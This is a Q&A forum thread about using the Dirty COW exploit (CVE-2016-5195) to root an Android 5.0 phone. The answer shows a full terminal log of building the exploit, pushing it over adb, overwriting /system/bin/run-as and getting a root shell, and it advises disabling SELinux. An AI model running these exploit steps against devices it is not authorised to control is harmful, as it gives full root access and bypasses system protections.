# Error when using DirtyCow

Tags: root-access, 5.0-lollipop, superuser

I get an error when launching an exploit CVE-2016-5195. The work of the exploit is completed, without getting root rights. I checked my phone for this vulnerability with make test, as a result I received that the phone is affected by this vulnerability.
[image]

I will be grateful for the help.

Answer (score 1):

Did you use this ADB Exploit specifically for Android ?

```
$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/dev/git/exploits/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/dev/git/exploits/CVE-2016-5195'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17944) differ

[*] size 5544
[*] mmap 0xb536b000
[*] currently 0xb536b000=464c457f
[*] madvise = 0xb536b000 5544
[*] madvise = 0 0
[*] /proc/self/mem 5544 1
[*] exploited 0xb536b000=464c457f
adb shell /system/bin/run-as
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
/system/bin/sh: can't find tty fd: No such device or address
/system/bin/sh: warning: won't have full job control
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
shamu:/ #
```

Because it Only Gains Root Access,...
You need to install a Root Access Manager yourself...

After getting UID = 0 ( Root Access ) 
Push SU Binary & Super User Application to the device..

> This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB. It does not disable SELinux (see https://github.com/timwr/CVE-2016-5195/issues/9) or install superuser on the device.

You need to disable SE Linux Also...